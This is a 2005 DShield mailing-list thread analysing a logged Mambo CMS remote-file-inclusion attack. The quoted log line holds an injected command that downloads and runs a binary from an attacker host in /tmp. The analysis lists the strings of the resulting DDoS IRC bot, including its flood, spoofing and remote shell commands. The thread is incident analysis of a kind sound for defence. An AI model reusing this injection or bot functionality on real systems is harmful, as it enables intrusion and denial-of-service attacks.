[Dshield] Can Someone Decipher This Log Entry?

Joel Esler eslerj at gmail.com
Thu Dec 22 12:41:37 GMT 2005


Stephanie -- Excellent Analysis.

Short end of the stick...  I've seen tons of these hit my machine  
lately, and I usually download the code and let it connect just for  
fun..  (oh yeah, then I tell #dshield about it in irc.freenode.net  
and it usually gets shut down post haste)

it's an IRC connector/remote shell client thingy (i know that's  
technical) for botnet usage.  I have about 4 different types on my  
machine in a folder called  "fun".

Joel


On Dec 22, 2005, at 5:30 AM, Stephane Grobety wrote:

> Hello David,
>
> I've masked part of the IP you provided in your message, just in case
> in case. It's a bit silly considering you didn't do the same, but,
> well, it does no additional harm...
>
> it looks like that this is an attempt to exploit a flaw in the Mambo
> content management software (looks like it's this one:
> http://secunia.com/advisories/14337/).
>
> If the exploit succeeds, it will try to wget a file called "micu" from
> XXX.136.48.69 into the /tmp folder and execute it.
>
> At this moment, that server is still serving the file so I checked it.
> What it does is try to download and execute two more files: "mare"  
> and "ro"
>
> "mare" isn't available on the remote server but "ro" is. it looks like
> an ELF executable. Now, I'm not a specialist of that file format so
> I may be completely wrong here but this looks like a Linux x86
> executable file. It seems to link the /lib/ld-linux.so.2 library and
> import a bunch of functions that you expect from a IP server program.
> It also contains a number of strings that indicates that it might try
> to contact an IRC server (*.undernet.org). It also has a nice internal
> help that is probably intended to be used by the attacker:
>
> NOTICE %s :Current status is: %s.
> NOTICE %s :Already disabled.
> NOTICE %s :Password too long! > 254
> NOTICE %s :Disable sucessful.
> NOTICE %s :ENABLE <pass>
> NOTICE %s :Already enabled.
> NOTICE %s :Wrong password
> NOTICE %s :Password correct.
> NOTICE %s :Removed all spoofs
> NOTICE %s :What kind of subnet address is that? Do something like:  
> 169.40
> NOTICE %s :Unable to resolve %s
> NOTICE %s :UDP <target> <port> <secs>
> NOTICE %s :Packeting %s.
> NOTICE %s :PAN <target> <port> <secs>
> NOTICE %s :Panning %s.
> NOTICE %s :TSUNAMI <target> <secs>
> NOTICE %s :Tsunami heading for %s.
> NOTICE %s :UNKNOWN <target> <secs>
> NOTICE %s :Unknowning %s.
> NOTICE %s :MOVE <server>
> NOTICE %s :TSUNAMI <target> <secs>                          =  
> Special packeter that wont be blocked by most firewalls
> NOTICE %s :PAN <target> <port> <secs>                       = An  
> advanced syn flooder that will kill most network drivers
> NOTICE %s :UDP <target> <port> <secs>                       = A udp  
> flooder
> NOTICE %s :UNKNOWN <target> <secs>                          =  
> Another non-spoof udp flooder
> NOTICE %s :NICK <nick>                                      =  
> Changes the nick of the client
> NOTICE %s :SERVER <server>                                  =  
> Changes servers
> NOTICE %s :GETSPOOFS                                        = Gets  
> the current spoofing
> NOTICE %s :SPOOFS <subnet>                                  =  
> Changes spoofing to a subnet
> NOTICE %s :DISABLE                                          =  
> Disables all packeting from this client
> NOTICE %s :ENABLE                                           =  
> Enables all packeting from this client
> NOTICE %s :KILL                                             = Kills  
> the client
> NOTICE %s :GET <http address> <save as>                     =  
> Downloads a file off the web and saves it onto the hd
> NOTICE %s :VERSION                                          =  
> Requests version of client
> NOTICE %s :KILLALL                                          = Kills  
> all current packeting
> NOTICE %s :HELP                                             =  
> Displays this
> NOTICE %s :IRC <command>                                    = Sends  
> this command to the server
> NOTICE %s :SH <command>                                     =  
> Executes a command
> NOTICE %s :Killing pid %d.
>
> So what this looks like is a client for a DDoS botnet.
>
> Other entries in the program seems to indicate it's been compiled on a
> Debian system:
>
> /home/drow/debian-glibc/
>
> There is also something that looks very much like an HTTP request:
>
> GET /%s HTTP/1.0
> Connection: Keep-Alive
> User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
> Host: %s:80
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/ 
> png, */*
> Accept-Encoding: gzip
> Accept-Language: en
> Accept-Charset: iso-8859-1,*,utf-8
>
> It would be interesting to see if the request matches your log entry:
> I think the above request is part of the exploit code.
>
> I did a bit of google research and found several DDoS client that are
> apparently based on the same code that contains the same string
> literals.
>
> That's all I can say about this... The attacker is still up and
> running and probably still scanning networks trying to drop it's
> maleware.
>
> Good luck,
> Stephane
>
>
> Wednesday, December 21, 2005, 10:53:14 PM, you wrote:
>
> DCH> I have about 25 of these today. I've added index2.php to the  
> firewall watcher.
> DCH> I cannot make sense of this Apache print:
>
> DCH> 85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php? 
> option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option] 
> =com_content&_REQUEST[Itemid] 
> =1&GLOBALS=&mosConfig_absolute_path=http://XXX.136.48.69/cmd.gif? 
> &cmd=cd%20/tmp;wget%20XXX.136.48.69/micu;chmod%20744%20micu;./ 
> micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"
>
>
>
>
> -- 
> Best regards,
>  Stephane                            mailto:security at admin.fulgan.com
>
> _________________________________________
> Learn about Intrusion Detection in Depth from the comfort of your  
> own couch:
> https://www.sans.org/athome/details.php?id=1341&d=1
>
> _______________________________________________
> send all posts to list at lists.dshield.org
> To change your subscription options (or unsubscribe), see: http:// 
> www.dshield.org/mailman/listinfo/list



More information about the list mailing list